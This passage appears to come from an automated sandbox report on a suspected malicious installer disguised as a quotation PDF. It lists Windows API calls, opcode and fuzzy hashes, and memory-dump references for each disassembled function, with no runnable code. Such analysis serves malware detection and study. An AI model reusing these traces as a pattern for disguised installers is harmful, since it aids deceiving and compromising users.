                                                                                                                                  • Opcode ID: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
                                                                                                                                  • Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
                                                                                                                                  • Opcode Fuzzy Hash: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
                                                                                                                                  • Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(?), ref: 00401D59
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                                                  • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3808545654-0
                                                                                                                                  • Opcode ID: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
                                                                                                                                  • Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
                                                                                                                                  • Opcode Fuzzy Hash: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
                                                                                                                                  • Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                                  • wsprintfW.USER32 ref: 00404A1A
                                                                                                                                  • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                                                  • String ID: %u.%u%s%s
                                                                                                                                  • API String ID: 3540041739-3551169577
                                                                                                                                  • Opcode ID: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
                                                                                                                                  • Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
                                                                                                                                  • Opcode Fuzzy Hash: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
                                                                                                                                  • Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8
                                                                                                                                  APIs
                                                                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                  • String ID: !
                                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                                  • Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                                  • Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
                                                                                                                                  • Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                                  • Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68
                                                                                                                                  APIs
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                                                  • wsprintfW.USER32 ref: 00406411
                                                                                                                                  • LoadLibraryW.KERNEL32(?), ref: 00406421
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                  • String ID: %s%S.dll
                                                                                                                                  • API String ID: 2200240437-2744773210
                                                                                                                                  • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                                  • Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
                                                                                                                                  • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                                  • Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8
                                                                                                                                  APIs
                                                                                                                                  • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                                                  • lstrlenW.KERNEL32(0040B5F0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateValuelstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1356686001-0
                                                                                                                                  • Opcode ID: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
                                                                                                                                  • Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
                                                                                                                                  • Opcode Fuzzy Hash: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
                                                                                                                                  • Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                    • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                    • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,759223A0), ref: 0040520F
                                                                                                                                    • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                    • Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                                    • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3585118688-0
                                                                                                                                  • Opcode ID: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
                                                                                                                                  • Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
                                                                                                                                  • Opcode Fuzzy Hash: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
                                                                                                                                  • Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D
                                                                                                                                  APIs
                                                                                                                                  • CreateDirectoryW.KERNEL32(?,0040A300,00441800), ref: 004056C6
                                                                                                                                  • GetLastError.KERNEL32 ref: 004056DA
                                                                                                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                                                                                                                                  • GetLastError.KERNEL32 ref: 004056F9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3449924974-0
                                                                                                                                  • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                                  • Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
                                                                                                                                  • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                                  • Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9
                                                                                                                                  APIs
                                                                                                                                  • DestroyWindow.USER32(?,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                                                  • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2102729457-0
                                                                                                                                  • Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                                  • Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
                                                                                                                                  • Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                                  • Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C
                                                                                                                                  APIs
                                                                                                                                  • IsWindowVisible.USER32(?), ref: 00405157
                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                                                                                                                                    • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                                                  • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                                  • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                                                                                                                                  • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                                  • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00405C77
                                                                                                                                  • GetTempFileNameW.KERNEL32(0040A300,?,00000000,?,?,?,00000000,0040329E,00441000,00441800,00441800,00441800,00441800,00441800,00441800,004034CC), ref: 00405C92
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountFileNameTempTick
                                                                                                                                  • String ID: nsa
                                                                                                                                  • API String ID: 1716503409-2209301699
                                                                                                                                  • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                                  • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                                                                                                                                  • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                                  • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                                  • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                                  Strings
                                                                                                                                  • Error launching installer, xrefs: 00405748
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                                  • String ID: Error launching installer
                                                                                                                                  • API String ID: 3712363035-66219284
                                                                                                                                  • Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                                  • Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
                                                                                                                                  • Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                                  • Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Xaq$Xaq$Xaq$Xaq
                                                                                                                                  • API String ID: 0-4015495023
                                                                                                                                  • Opcode ID: 63ad6b4cc35b8a9d1ea1f0785baf756753222de71ef1d337c05c9d3264cec513
                                                                                                                                  • Instruction ID: 0eef9ea72368b3da1d63d8bb5f94dcf5fa35c704b9f21d67d241d8ff4643175d
                                                                                                                                  • Opcode Fuzzy Hash: 63ad6b4cc35b8a9d1ea1f0785baf756753222de71ef1d337c05c9d3264cec513
                                                                                                                                  • Instruction Fuzzy Hash: 7A316330E0131A9BDFA48FA889403AEB6E6BF94310F154067C415A7355EF30CD81DBA2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: \;]q$\;]q$\;]q$\;]q
                                                                                                                                  • API String ID: 0-2351511683
                                                                                                                                  • Opcode ID: 05eba810a8ba63ba32bfbdc426fc8dd71860870b1b01497391347c82080345e8
                                                                                                                                  • Instruction ID: bc50a0f427712a87b55e48a3e10c07234761a8872a407652183948f6b851c875
                                                                                                                                  • Opcode Fuzzy Hash: 05eba810a8ba63ba32bfbdc426fc8dd71860870b1b01497391347c82080345e8
                                                                                                                                  • Instruction Fuzzy Hash: 8001D431740A05CFCBA48E2CC8A0929B3EAAF88772725446BE845CB370DA31DC41C7A0
                                                                                                                                  APIs
                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                                                                                                                                  • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 190613189-0
                                                                                                                                  • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                                  • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                                                                                                                                  • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                                  • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9